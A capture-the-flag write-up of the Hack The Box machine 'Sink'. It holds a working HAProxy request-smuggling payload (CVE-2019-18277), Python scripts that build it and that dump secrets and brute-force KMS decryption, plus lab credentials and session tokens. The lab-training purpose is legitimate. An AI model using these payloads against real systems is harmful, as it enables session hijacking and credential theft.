Introduction@Sink:~$
| Column | Details |
|---|---|
| Name | Sink |
| IP | 10.10.10.225 |
| Points | 50 |
| OS | Linux |
| Difficulty | Insane |
| Creator | MrR3boot |
| Out On | 24 Oct 2020 |
Pwned
Recon
Nmap
```
┌─[root@d3dsec]─[~/Desktop/HTB/Sink]
└──╼ #nmap -sC -sV -p- 10.10.10.225
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3000/tcp  open     ppp?
3971/tcp  filtered lanrevserver
5000/tcp  open     http           Gunicorn 20.0.0
5502/tcp  filtered fcp-srvr-inst1
15587/tcp filtered unknown
33076/tcp filtered unknown
33578/tcp filtered unknown
34042/tcp filtered unknown
35365/tcp filtered unknown
35514/tcp filtered unknown
37653/tcp filtered unknown
49460/tcp filtered unknown
52393/tcp filtered unknown
61352/tcp filtered unknown
62934/tcp filtered unknown
64002/tcp filtered unknown
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
```
Two web services are up: port 5000 serves the "devops" web application and port 3000 serves Gitea.
Port-5000
There is a simple sign-in page.
Let's register an account and log in.
Login succeeds.
While enumerating the application, the response headers reveal the stack in front of it:
```
Server: gunicorn/20.0.0
Via: haproxy
```
A quick search turns up CVE-2019-18277, an HTTP request smuggling vulnerability in HAProxy (fixed in 2.0.6). A Transfer-Encoding header that contains a non-printable byte such as \x0b (vertical tab) is not recognised by HAProxy as chunked, so HAProxy delimits the request by Content-Length, yet it forwards the header unchanged and the backend (Gunicorn, which strips the control character) reads the body as chunked. The two parsers disagree about where the request ends, which is exactly what smuggling needs.
Link : HAProxy HTTP request smuggling (CVE-2019-18277)
For a walkthrough of the attack there is also a video:
Link : (CVE-2019-18277) POC
After reading the article and watching the video it's time for the practical part.
I post a comment and send the captured request to Burp Repeater.
Now edit that request: append a second, smuggled POST /comment inside the body, copy the same Cookie header (including the _csrf token) into it, and leave your own session cookie unchanged, so the smuggled request is attributed to your account and whatever it captures lands in your comment.
```
POST /comment HTTP/1.1
Host: 10.10.10.225:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin: http://10.10.10.225:5000
DNT: 1
Connection: keep-alive
Referer: http://10.10.10.225:5000/home
Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6ImRlZHNlY0BzaW5rLmh0YiJ9.YCS9Ag.Q2lHGbCIpw_j32RHAgV1Wf3Q8_o
Upgrade-Insecure-Requests: 1
Transfer-Encoding: Cwo=chunked

5
msg=a
0

POST /comment HTTP/1.1
Host: localhost:5000
Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6ImRlZHNlY0BzaW5rLmh0YiJ9.YCS9Ag.Q2lHGbCIpw_j32RHAgV1Wf3Q8_o
Content-Length: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

msg=
```
The "Cwo=" in the Transfer-Encoding header is a base64 placeholder, because Repeater cannot type the control character directly. Select it and press Ctrl+Shift+B to base64-decode the selection in place; that inserts the raw non-printable bytes (leading with the \x0b vertical tab that HAProxy mishandles) in front of "chunked", and the request looks as shown in the screenshot.
Now send the request.
The smuggled request declares Content-Length: 300 but carries only the 4-byte body "msg=", so Gunicorn keeps waiting and the next request that arrives on that backend connection, the admin's internal note-deletion call, is swallowed into the comment text. Reload the home page and the new comment contains the admin's full request, session cookie included.
```
Comment By: dedsec
GET /notes/delete/1234 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YCSoRQ.Al5wRr7IJ-1JDg1HBnOmbwtpVAs
X-Forwarded-For: 127.0.0.1
Delete
```
```
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YCSoRQ.Al5wRr7IJ-1JDg1HBnOmbwtpVAs
```
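As an added example (not code from the original writeup), here is the same CVE-2019-18277 request built by hand in Python instead of in Burp, plus the helper that pulls the leaked session value out of the captured comment. The target address, session cookie and _csrf value are placeholders to substitute from your own logged-in session; `send_raw()` is only needed on the lab network and pushes the bytes over a plain socket because an HTTP client library would "repair" the malformed header.

```python
import re
import socket

# Added example, not code from the original writeup. Target and cookie values
# are placeholders: substitute the ones from your own logged-in session.
TARGET = ("10.10.10.225", 5000)               # assumed: the box from the writeup
SESSION = "REPLACE_WITH_YOUR_SESSION_COOKIE"  # assumed placeholder
CSRF = "REPLACE_WITH_YOUR_CSRF_TOKEN"         # assumed placeholder

# CVE-2019-18277: a vertical tab (\x0b) in front of "chunked" is not a valid
# transfer coding for HAProxy < 2.0.6, so HAProxy delimits the request with
# Content-Length, but it forwards the header as-is and Gunicorn (which strips
# the control character) decodes the body as chunked. The two parsers now
# disagree about where the request ends.
BAD_TE = b"\x0bchunked"


def build_smuggle_request(host, port, session, csrf, smuggled_cl=300):
    """Return the raw bytes of the outer request with the smuggled one inside."""
    cookie = f"_csrf={csrf}; session={session}".encode()

    # What Gunicorn sees as the *next* request on the backend connection. Its
    # Content-Length (300) is far larger than the 4-byte "msg=" body, so
    # Gunicorn keeps reading and the next request HAProxy forwards on this
    # connection (the admin's internal /notes/delete call) becomes the
    # comment text, cookie and all.
    smuggled = b"".join([
        b"POST /comment HTTP/1.1\r\n",
        b"Host: localhost:%d\r\n" % port,
        b"Cookie: " + cookie + b"\r\n",
        b"Content-Length: %d\r\n" % smuggled_cl,
        b"Connection: keep-alive\r\n",
        b"Content-Type: application/x-www-form-urlencoded\r\n",
        b"\r\n",
        b"msg=",
    ])

    # One real 5-byte chunk ("msg=a"), the terminating 0-chunk, then the
    # smuggled request. For HAProxy all of this is just the CL-delimited body.
    body = b"5\r\nmsg=a\r\n0\r\n\r\n" + smuggled
    head = b"".join([
        b"POST /comment HTTP/1.1\r\n",
        b"Host: %s:%d\r\n" % (host.encode(), port),
        b"Content-Type: application/x-www-form-urlencoded\r\n",
        b"Content-Length: %d\r\n" % len(body),      # the value HAProxy uses
        b"Cookie: " + cookie + b"\r\n",
        b"Connection: keep-alive\r\n",
        b"Transfer-Encoding: " + BAD_TE + b"\r\n",  # the header Gunicorn uses
        b"\r\n",
    ])
    return head + body


def outer_content_length(raw):
    """Content-Length of the outer request (the value HAProxy trusts)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    match = re.search(rb"^Content-Length: (\d+)\r?$", head, re.M)
    return int(match.group(1))


def body_is_consistent(raw):
    """True when the outer Content-Length covers exactly the rest of the request."""
    body = raw.split(b"\r\n\r\n", 1)[1]
    return outer_content_length(raw) == len(body)


_SESSION_RE = re.compile(r"session=([A-Za-z0-9_.\-]+)")


def extract_session_cookie(comment_text):
    """Pull the leaked session value out of the comment that captured the admin's request."""
    match = _SESSION_RE.search(comment_text)
    return match.group(1) if match else None


def send_raw(raw, target=TARGET, timeout=5.0):
    """Send the bytes verbatim over a socket and return whatever comes back."""
    chunks = []
    with socket.create_connection(target, timeout=timeout) as sock:
        sock.sendall(raw)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    req = build_smuggle_request(TARGET[0], TARGET[1], SESSION, CSRF)
    assert body_is_consistent(req)
    print(req.decode("latin-1"))
    # On the lab network: send_raw(req), then reload /home and run
    # extract_session_cookie() over the text of the new comment.
```

The outer Content-Length is computed from the assembled body rather than typed by hand, which is the part that most often goes wrong when editing the request in Repeater: if it is short, HAProxy truncates the smuggled request; if it is long, HAProxy waits for bytes that never come.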
Now replace your session cookie with the admin one using Cookie-Editor and reload the page.
Link : Cookie-Editor
We are admin now; let's check the notes.
There are three notes; let's check all of them.
Note 1
Note 2
Note 3
We got three sets of credentials.
```
Note1:
Chef Login : http://chef.sink.htb
Username : chefadm
Password : /6'fEGC&zEx{4]zz
Note2:
Dev Node URL : http://code.sink.htb
Username : root
Password : FaH@3L>Z3})zzfQ3
Note3:
Nagios URL : https://nagios.sink.htb
Username : nagios_adm
Password : g8<H6GK\{*L.fB3C
```
Let's try these credentials on port 3000 (Gitea).
The root credentials first.
Login succeeds.
While enumerating the repositories I found marcus's private SSH key, id_rsa_marcus, left in a commit of the Key_Management repo.
Location : http://10.10.10.225:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e
id_rsa_marcus
```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```
Let's SSH in with it. Paste the key into a file and tighten the permissions first, or ssh refuses to use it.
```
vim id_rsa_marcus
chmod 600 id_rsa_marcus
ssh -i id_rsa_marcus marcus@10.10.10.225
```
Let's grab user.txt.
Privilege escalation
Back in the Gitea enumeration on port 3000, commit e8d68917f2570f3695030d0ded25dc95738fb1ba in the Log_Management repo holds a PHP script with an AWS access key and secret. It talks to a local AWS-compatible API on 127.0.0.1:4566 (LocalStack's default port), so the keys are usable from the box itself.
location : http://10.10.10.225:3000/root/Log_Management/commit/e8d68917f2570f3695030d0ded25dc95738fb1ba
```php
<?php
require 'vendor/autoload.php';
use Aws\CloudWatchLogs\CloudWatchLogsClient;
use Aws\Exception\AwsException;
$client = new CloudWatchLogsClient([
    'region' => 'eu',
    'endpoint' => 'http://127.0.0.1:4566',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version' => 'latest'
]);
try {
    $client->createLogGroup(array(
        'logGroupName' => 'Chef_Events',
    ));
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
try {
    $client->createLogStream([
        'logGroupName' => 'Chef_Events',
        'logStreamName' => '20201120'
    ]);
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>
```
Let's configure the AWS CLI inside the SSH session with the leaked key pair. The endpoint is local, so the region value is arbitrary.
```
aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]: json
```
Then point the CLI at the local endpoint and list the secrets in Secrets Manager:
```
aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets
```
The "Jira Support" secret holds david's password:
```
aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-HRbzR"
```
```
Username = david
Password = EALB=bcC=`a7f2#k
```
Switch to david with it:
```
su david
EALB=bcC=`a7f2#k
```
Inside /home/david/Projects/Prod_Deployment there is a servers.enc file, an encrypted blob.
Decrypting it still has to go through the local AWS endpoint, this time KMS.
Analysing the project showed it relies on the keys returned by list-keys, and it errored when run directly; updating the version setting inside to the latest one fixed that.
So first configure the AWS CLI as david (david's account has its own ~/.aws, so this has to be repeated):
```
aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]: json
```
Then list the KMS keys:
```
aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys
```
Now try decrypting servers.enc with every key. Some of the keys are disabled and KMS refuses to decrypt with a disabled key, so each key is enabled first; the decrypt call names the algorithm explicitly (RSAES_OAEP_SHA_256, the one that works here) because asymmetric keys require it. The loop prints the Plaintext field for whichever key succeeds and an error for the rest.
```
for KEY in $(aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{ print $4 }'); do
  aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "${KEY}"
  aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "${KEY}" \
    --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" \
    --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext"
done
```
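As an added example (not code from the original writeup), the Secrets Manager enumeration and the KMS try-every-key loop above, driven through boto3 instead of the aws CLI. The endpoint and key pair are the ones leaked in the Log_Management commit; the region, the algorithm list and the output file name are my assumptions. The helpers take the client as a parameter, so any object with the same method names as a boto3 client can stand in for it.

```python
# Added example, not code from the original writeup. Endpoint and key pair are
# the leaked ones; REGION, ALGORITHMS and OUTPUT are assumed values.
ENDPOINT = "http://127.0.0.1:4566"
ACCESS_KEY = "AKIAIUEN3QWCPSTEITJQ"
SECRET_KEY = "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"
REGION = "us-west-2"                                        # assumed; local endpoint ignores it
CIPHERTEXT = "/home/david/Projects/Prod_Deployment/servers.enc"
OUTPUT = "servers.dec"                                      # assumed output name

# Algorithms to try per key; on this box the working one is RSAES_OAEP_SHA_256.
ALGORITHMS = ("RSAES_OAEP_SHA_256", "RSAES_OAEP_SHA_1", "SYMMETRIC_DEFAULT")


def make_client(service):
    """boto3 client pinned to the local endpoint; imported lazily so the helpers work without boto3."""
    import boto3
    return boto3.client(service, endpoint_url=ENDPOINT, region_name=REGION,
                        aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)


def dump_secrets(sm):
    """Return {name: SecretString} for every secret, following NextToken pagination."""
    found, token = {}, None
    while True:
        resp = sm.list_secrets(NextToken=token) if token else sm.list_secrets()
        for entry in resp.get("SecretList", []):
            value = sm.get_secret_value(SecretId=entry["ARN"])
            found[entry["Name"]] = value.get("SecretString")
        token = resp.get("NextToken")
        if not token:
            return found


def list_all_keys(kms):
    """KeyIds of every key; ListKeys paginates with Marker/NextMarker, unlike ListSecrets."""
    ids, marker = [], None
    while True:
        resp = kms.list_keys(Marker=marker) if marker else kms.list_keys()
        ids.extend(k["KeyId"] for k in resp.get("Keys", []))
        if not resp.get("Truncated"):
            return ids
        marker = resp["NextMarker"]


def decrypt_with_any_key(kms, ciphertext):
    """Try each key with each algorithm; return (key_id, plaintext_bytes) or None.

    Disabled keys refuse to decrypt, so every key is enabled first, as the CLI
    loop does. boto3 hands back Plaintext already base64-decoded, unlike the
    CLI's text output, so the result is the raw decrypted file.
    """
    for key_id in list_all_keys(kms):
        try:
            kms.enable_key(KeyId=key_id)
        except Exception:  # boto3 raises ClientError for keys that cannot be enabled
            pass
        for alg in ALGORITHMS:
            try:
                resp = kms.decrypt(KeyId=key_id, CiphertextBlob=ciphertext,
                                   EncryptionAlgorithm=alg)
            except Exception:  # wrong key or wrong algorithm for this key
                continue
            return key_id, resp["Plaintext"]
    return None


if __name__ == "__main__":
    for name, value in dump_secrets(make_client("secretsmanager")).items():
        print(f"{name}: {value}")
    with open(CIPHERTEXT, "rb") as fh:
        blob = fh.read()
    hit = decrypt_with_any_key(make_client("kms"), blob)
    if hit is None:
        raise SystemExit("no key decrypted servers.enc")
    key_id, plaintext = hit
    with open(OUTPUT, "wb") as fh:
        fh.write(plaintext)
    print(f"decrypted with {key_id}: {len(plaintext)} bytes written to {OUTPUT}; inspect with `file`")
```

Because boto3 returns the decrypted bytes directly, the base64 step the CLI needs is gone; the written file can be inspected with `file` and opened as-is.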
The Plaintext the CLI prints is base64. Decode it in CyberChef; the decoded data contains a servers.yml file.
Link : CyberChef
Click on servers.yml and the admin password is in it, and it turns out to be the root password as well.
```
User : admin
Password : _uezduQ!EY5AHfe2
```
Now SSH in as root with that password.
```
ssh root@10.10.10.225
```
And grab root.txt.
And we pwned it …….
If you liked the writeup, consider supporting a student getting the OSCP cert: Donation for OSCP
Resources
| Topic | Url |
|---|---|
| HAProxy HTTP request smuggling (CVE-2019-18277) | https://nathandavison.com/blog/haproxy-http-request-smuggling |
| (CVE-2019-18277) POC | https://www.youtube.com/watch?v=nq0ndhkfV_M |
| Cookie-Editor | https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/ |
| CyberChef | https://gchq.github.io/CyberChef/ |